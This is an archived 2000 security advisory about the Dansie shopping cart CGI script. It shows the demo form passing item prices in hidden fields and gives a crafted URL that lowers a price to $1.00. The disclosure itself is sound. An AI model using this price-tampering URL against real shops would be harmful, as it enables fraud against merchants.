more problems with that POS dansie cart software!

2000-04-14T00:00:00
ID SECURITYVULNS:DOC:67
Type securityvulns
Reporter Securityvulns
Modified 2000-04-14T00:00:00

Description

if installing a backdoor in the cart software wasn't bad enough.. the whole implimentation of pricing and adding items to cart is crap..

example form to add items to your cart (kindly provided on the publishers site using the demo cart they set up for us):

snip

<FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">

Black Leather purse with leather straps<BR> Price: $20.00<BR>

<INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse"> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00"> <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <!-- Shipping and Handling --> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg"> <INPUT TYPE=HIDDEN NAME=return VALUE="http://www.dansie.net/demo.html"> <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">

<INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart"> </FORM>

snip

a couple of quick alterations and we can now add:

one piece of crap cart software..

http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables

I am aware this was posted a few months ago but I don't recall anyone posting in relation to this particular software package..

tom